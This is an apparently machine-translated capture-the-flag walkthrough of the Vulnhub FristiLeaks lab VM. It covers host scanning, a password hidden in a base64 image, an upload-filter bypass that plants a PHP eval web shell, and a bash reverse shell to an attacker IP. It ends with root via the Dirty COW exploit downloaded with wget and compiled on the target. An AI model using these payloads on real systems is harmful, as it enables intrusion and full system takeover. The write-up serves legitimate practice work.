Vulnhub FristiLeaks drone penetration

The VM configuration

VMware users will need to manually edit the VM's MAC address to: 08:00:27:A5:A6:76
Select this drone on VM, editing - "Network Adapters -" Advanced - "to modify the MAC address
to open drone

Information gathering

nmap -sP 192.168.146.0/24 #主机发现
nmap -A 192.168.146.150 #综合扫描

End web access, view source code

After several directory access robots.txt which is a picture

Then scan the directory, dirb be used in conjunction with bp
dirb url #当然也可以直接在后面指定字典

What sensitive information not found.
Collect collect. . .
Finally, try to fristi as a path to access http://192.168.146.150/fristi/into the background. . .

Take a look at the source code, get some tips

iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx
jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl
S0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw
B4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f
m63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ
Zv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb
DpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd
jJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU
12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5
uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1
04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq
i1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg
tOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws
30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl
3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK
ul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q
mD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34
rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe
EPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH
AHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk
CwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR
U5ErkJggg==

Decrypting about this base64, found png

keKkeKKeKKeKkEkkEkFeels like a password, try the next landing.
admin can not log on, but just suggesting there was signed eezeepz. With this user name can be successful landing

getFlag

File upload getshell

File upload, upload files to it directly.
Only upload suffix .png, .jpg files, but apache2.2 exists to resolve vulnerabilities (nmap scan has learned)
so capture the php file to change the suffix to php.jpg uploaded successfully

<?php @eval($_POST[A1oe]); ?>

Then connect ants sword

Even after a Glance moment, then rebounded virtual terminal shell. There is no direct command nc with bash command. (You can also upload a rebound shell php script directly)
bash -i >& /dev/tcp/192.168.146.132/4444 0>&1

Put right

Check system version

It found to be 2.6.32, and we know that dirty cow mention the right sphere of influence: Linux内核>=2.6.22you can see very close, if not patched, you can certainly use.
searchsploit cow

Take a look at these documents were found 40839.c files directly compile and run on the line more convenient, so I chose to use this

# 使用方式:本机把脚本down下来，然后开启web服务供靶机使用wget下载
root@kali:~# cp /usr/share/exploitdb/exploits/linux/local/40839.c /var/www/html/
root@kali:~# service apache2 start

# 靶机
wget http://192.168.146.132/40839.c
gcc -pthread 40839.c -o dirty -lcrypt
./dirty A1oe
su firefart

Successfully provide the right to obtain a flag

to sum up

Directory scan is very important.
Dirty cattle under review.